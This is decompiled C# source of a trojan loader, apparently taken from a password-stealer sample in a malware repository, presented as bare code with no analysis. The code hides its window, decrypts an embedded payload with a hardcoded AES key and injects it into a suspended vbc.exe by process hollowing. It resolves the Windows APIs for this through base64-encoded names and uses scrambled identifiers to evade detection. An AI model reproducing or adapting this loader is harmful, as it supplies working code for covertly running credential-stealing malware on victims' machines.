// Decompiled with JetBrains decompiler // Type: Program.Main // Assembly: kripted, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null // MVID: F2186B1A-2E99-4A23-AA3D-671873E0755D // Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-PSW.Win32.Chisburg.whx-d16332af030d1b00f8f014c06b4e039d4e412ad6c23b4d921524f9a3e027784f.exe using Microsoft.VisualBasic.CompilerServices; using System; using System.ComponentModel; using System.Diagnostics; using System.Drawing; using System.Runtime.CompilerServices; using System.Runtime.InteropServices; using System.Security.Cryptography; using System.Text; using System.Windows.Forms; namespace Program { public class Main : Form { private IContainer Components; private StringBuilder đžhuxHŠhBqYDXmćIi; [STAThread] public static void Main() => Application.Run((Form) new Program.Main()); public Main() { this.Load += new EventHandler(this.Main_Load); this.đžhuxHŠhBqYDXmćIi = new StringBuilder(); Application.EnableVisualStyles(); this.InitializeComponent(); this.SuspendLayout(); this.AutoScaleDimensions = new SizeF(6f, 13f); this.AutoScaleMode = AutoScaleMode.Font; this.ClientSize = new Size(1, 1); this.Opacity = 0.0; this.ShowInTaskbar = false; this.Name = nameof (Main); this.Text = nameof (Main); this.ResumeLayout(false); this.PerformLayout(); } protected override void Dispose(bool Disposing) { if (Disposing && this.Components != null) this.Components.Dispose(); base.Dispose(Disposing); } [DebuggerStepThrough] private void InitializeComponent() { } public byte[] oBŠCJfŠIgbTTšNvribUA(byte[] NiwjwQĆNFSđZYšWnNw) { using (RijndaelManaged rijndaelManaged = new RijndaelManaged()) { rijndaelManaged.IV = new byte[16] { (byte) 5, (byte) 8, (byte) 8, (byte) 6, (byte) 7, (byte) 7, (byte) 3, (byte) 1, (byte) 5, (byte) 2, (byte) 5, (byte) 6, (byte) 4, (byte) 7, (byte) 3, (byte) 4 }; rijndaelManaged.Key = new byte[16] { (byte) 4, (byte) 3, (byte) 7, (byte) 4, (byte) 6, (byte) 5, (byte) 2, (byte) 5, (byte) 1, (byte) 3, (byte) 7, (byte) 7, (byte) 6, (byte) 8, (byte) 8, (byte) 5 }; return rijndaelManaged.CreateDecryptor().TransformFinalBlock(NiwjwQĆNFSđZYšWnNw, 0, NiwjwQĆNFSđZYšWnNw.Length); } } [DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true)] public static extern IntPtr LoadLibraryA([MarshalAs(UnmanagedType.VBByRefStr)] ref string name); [DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true)] public static extern IntPtr GetProcAddress(IntPtr handle, [MarshalAs(UnmanagedType.VBByRefStr)] ref string name); public T RđckvLgĐvXvrvosŠČK(string name, string method) => (T) Marshal.GetDelegateForFunctionPointer(Program.Main.GetProcAddress(Program.Main.LoadLibraryA(ref name), ref method), typeof (T)); public bool bXwlfCFJQbtsuorRQbi(byte[] ZOkCiOcinđžXZđKuOk, string HwČećNđDAUctfmXzHOz) { Program.Main.DQđlyZXQKUljwcsižj dqđlyZxqkUljwcsižj = this.RđckvLgĐvXvrvosŠČK(Encoding.UTF8.GetString(Convert.FromBase64String("a2VybmVsMzI=")), Encoding.UTF8.GetString(Convert.FromBase64String("Q3JlYXRlUHJvY2Vzc0E="))); Program.Main.KćHŠććvBVeZFNTHhnV hšććvBveZfntHhnV = this.RđckvLgĐvXvrvosŠČK(Encoding.UTF8.GetString(Convert.FromBase64String("a2VybmVsMzI=")), Encoding.UTF8.GetString(Convert.FromBase64String("R2V0VGhyZWFkQ29udGV4dA=="))); Program.Main.fbođRGšŽcnČGpUycĐšĆ fbođRgšŽcnČgpUycĐšĆ = this.RđckvLgĐvXvrvosŠČK(Encoding.UTF8.GetString(Convert.FromBase64String("a2VybmVsMzI=")), Encoding.UTF8.GetString(Convert.FromBase64String("UmVhZFByb2Nlc3NNZW1vcnk="))); Program.Main.DćgbvŽfweaihibVilWoB dćgbvŽfweaihibVilWoB = this.RđckvLgĐvXvrvosŠČK(Encoding.UTF8.GetString(Convert.FromBase64String("a2VybmVsMzI=")), Encoding.UTF8.GetString(Convert.FromBase64String("VmlydHVhbEFsbG9jRXg="))); Program.Main.yŽĐJlaškvrrkćlOgtq žđJlaškvrrkćlOgtq = this.RđckvLgĐvXvrvosŠČK(Encoding.UTF8.GetString(Convert.FromBase64String("a2VybmVsMzI=")), Encoding.UTF8.GetString(Convert.FromBase64String("V3JpdGVQcm9jZXNzTWVtb3J5"))); Program.Main.ŠvlWžNWILiTčŠUUA švlWžNwiLiTčŠuua = this.RđckvLgĐvXvrvosŠČK(Encoding.UTF8.GetString(Convert.FromBase64String("a2VybmVsMzI=")), Encoding.UTF8.GetString(Convert.FromBase64String("U2V0VGhyZWFkQ29udGV4dA=="))); Program.Main.ĆFnoPrdvŽĐPkđšwLGđm ćfnoPrdvŽđPkđšwLgđm = this.RđckvLgĐvXvrvosŠČK(Encoding.UTF8.GetString(Convert.FromBase64String("a2VybmVsMzI=")), Encoding.UTF8.GetString(Convert.FromBase64String("UmVzdW1lVGhyZWFk"))); Program.Main.ŠĆJĐčAPHHCodtSuo šćjĐčAphhCodtSuo = this.RđckvLgĐvXvrvosŠČK(Encoding.UTF8.GetString(Convert.FromBase64String("bnRkbGw=")), Encoding.UTF8.GetString(Convert.FromBase64String("WndVbm1hcFZpZXdPZlNlY3Rpb24="))); bool flag; try { IntPtr zero1 = IntPtr.Zero; IntPtr[] pĐUfJxXošTsYUQdVGx = new IntPtr[4]; byte[] yDoemFćaqJkćčIWLkh = new byte[68]; int int32_1 = BitConverter.ToInt32(ZOkCiOcinđžXZđKuOk, 60); int int16 = (int) BitConverter.ToInt16(ZOkCiOcinđžXZđKuOk, checked (int32_1 + 6)); IntPtr xDhpđBqŠIbJnLqEB = new IntPtr(BitConverter.ToInt32(ZOkCiOcinđžXZđKuOk, checked (int32_1 + 84))); if (dqđlyZxqkUljwcsižj((string) null, new StringBuilder(HwČećNđDAUctfmXzHOz), zero1, zero1, false, 4, zero1, (string) null, yDoemFćaqJkćčIWLkh, pĐUfJxXošTsYUQdVGx)) { uint[] numArray1 = new uint[179]; numArray1[0] = 65538U; if (hšććvBveZfntHhnV(pĐUfJxXošTsYUQdVGx[1], numArray1)) { IntPtr lHYtcldUušXrccECW = new IntPtr(checked ((long) numArray1[41] + 8L)); IntPtr zero2 = IntPtr.Zero; IntPtr žEdXtvpRfDeJABydđZz = new IntPtr(4); IntPtr zero3 = IntPtr.Zero; if (fbođRgšŽcnČgpUycĐšĆ(pĐUfJxXošTsYUQdVGx[0], lHYtcldUušXrccECW, ref zero2, (int) žEdXtvpRfDeJABydđZz, ref zero3) && šćjĐčAphhCodtSuo(pĐUfJxXošTsYUQdVGx[0], zero2) == 0U) { IntPtr num1 = new IntPtr(BitConverter.ToInt32(ZOkCiOcinđžXZđKuOk, checked (int32_1 + 52))); IntPtr num2 = new IntPtr(BitConverter.ToInt32(ZOkCiOcinđžXZđKuOk, checked (int32_1 + 80))); IntPtr ŽACĐbXomGGšŠAVyLčUć = dćgbvŽfweaihibVilWoB(pĐUfJxXošTsYUQdVGx[0], num1, num2, 12288, 64); int int32_2 = ŽACĐbXomGGšŠAVyLčUć.ToInt32(); int čePWVČDEEĐrEBwPNTHUs; int num3 = žđJlaškvrrkćlOgtq(pĐUfJxXošTsYUQdVGx[0], ŽACĐbXomGGšŠAVyLčUć, ZOkCiOcinđžXZđKuOk, checked ((uint) (int) xDhpđBqŠIbJnLqEB), čePWVČDEEĐrEBwPNTHUs) ? 1 : 0; int num4 = checked (int16 - 1); int num5 = 0; while (num5 <= num4) { int[] dst = new int[10]; Buffer.BlockCopy((Array) ZOkCiOcinđžXZđKuOk, checked (int32_1 + 248 + num5 * 40), (Array) dst, 0, 40); byte[] numArray2 = new byte[checked (dst[4] - 1 + 1)]; Buffer.BlockCopy((Array) ZOkCiOcinđžXZđKuOk, dst[5], (Array) numArray2, 0, numArray2.Length); num2 = new IntPtr(checked (int32_2 + dst[3])); num1 = new IntPtr(numArray2.Length); int num6 = žđJlaškvrrkćlOgtq(pĐUfJxXošTsYUQdVGx[0], num2, numArray2, checked ((uint) (int) num1), čePWVČDEEĐrEBwPNTHUs) ? 1 : 0; checked { ++num5; } } num2 = new IntPtr(checked ((long) numArray1[41] + 8L)); num1 = new IntPtr(4); int num7 = žđJlaškvrrkćlOgtq(pĐUfJxXošTsYUQdVGx[0], num2, BitConverter.GetBytes(ŽACĐbXomGGšŠAVyLčUć.ToInt32()), checked ((uint) (int) num1), čePWVČDEEĐrEBwPNTHUs) ? 1 : 0; numArray1[44] = checked ((uint) (ŽACĐbXomGGšŠAVyLčUć.ToInt32() + BitConverter.ToInt32(ZOkCiOcinđžXZđKuOk, int32_1 + 40))); int num8 = švlWžNwiLiTčŠuua(pĐUfJxXošTsYUQdVGx[1], numArray1) ? 1 : 0; } } int num = (int) ćfnoPrdvŽđPkđšwLgđm(pĐUfJxXošTsYUQdVGx[1]); } } catch (Exception ex) { ProjectData.SetProjectError(ex); flag = false; ProjectData.ClearProjectError(); goto label_11; } flag = true; label_11: return flag; } private void Main_Load(object sender, EventArgs e) { RuntimeHelpers.GetObjectValue(My.Resources.Resources.ResourceManager.GetObject("glavni")); this.bXwlfCFJQbtsuorRQbi(this.oBŠCJfŠIgbTTšNvribUA(My.Resources.Resources.glavni), Encoding.UTF8.GetString(Convert.FromBase64String("QzpcV2luZG93c1xNaWNyb3NvZnQuTkVUXEZyYW1ld29ya1x2Mi4wLjUwNzI3XHZiYy5leGU="))); this.Close(); } [return: MarshalAs(UnmanagedType.Bool)] public delegate bool DQđlyZXQKUljwcsižj( string čuxXhččVĐćLVmnĐšbwu, StringBuilder edbBlGCđplćZwQcrUĆOI, IntPtr ZešwZPIyvHvČoZSIvPbh, IntPtr JvNšXNeORĆabqvgj, [MarshalAs(UnmanagedType.Bool)] bool PšgJŽvLFAYRxštšfXJZš, int PPTČSttjioRfnqhNktqč, IntPtr etbčaPćotOĆiuNmĆe, string sĐRLLqtŠrSfPĆTCQUZiQ, byte[] yDoemFćaqJkćčIWLkh, IntPtr[] pĐUfJxXošTsYUQdVGx); public delegate bool yŽĐJlaškvrrkćlOgtq( IntPtr ĐlwXQfNHBwoŠRTDEŽačw, IntPtr ŽACĐbXomGGšŠAVyLčUć, byte[] ŠFOAwCVyIjjnIfNszč, uint xDhpđBqŠIbJnLqEB, int čePWVČDEEĐrEBwPNTHUs); [return: MarshalAs(UnmanagedType.Bool)] public delegate bool fbođRGšŽcnČGpUycĐšĆ( IntPtr pQkBZjĐEfmajnfFmXpz, IntPtr lHYtcldUušXrccECW, ref IntPtr JAŽšjKhuhXmEvtpgad, int žEdXtvpRfDeJABydđZz, ref IntPtr iLgVciRŽDAuežfgVvB); public delegate IntPtr DćgbvŽfweaihibVilWoB( IntPtr ĐmWmčWeAZHČČCvEPoĐšv, IntPtr LRQdkćŽJĐFĆhQŠcčZbKn, IntPtr rfšOKXhžUsgćVCXw, int VggzYBwvcLixWćyV, int ĐčfŽmhxZzbytRČmćvmv); public delegate uint ŠĆJĐčAPHHCodtSuo(IntPtr RkĆBxđLGeUVpEšgrzĐ, IntPtr HnyšxĆUjĐyKlfračlI); public delegate uint ĆFnoPrdvŽĐPkđšwLGđm(IntPtr ĆožBčliZRrŽBŽhGnvćy); [return: MarshalAs(UnmanagedType.Bool)] public delegate bool KćHŠććvBVeZFNTHhnV(IntPtr kpFhettcmCyČfjOdJJQ, uint[] IRĐeHIAPŽAPŽdRehh); [return: MarshalAs(UnmanagedType.Bool)] public delegate bool ŠvlWžNWILiTčŠUUA(IntPtr VScŽcČqZRPvYćBdaXK, uint[] ĐhQNPoXaĆsDDČrmP); } }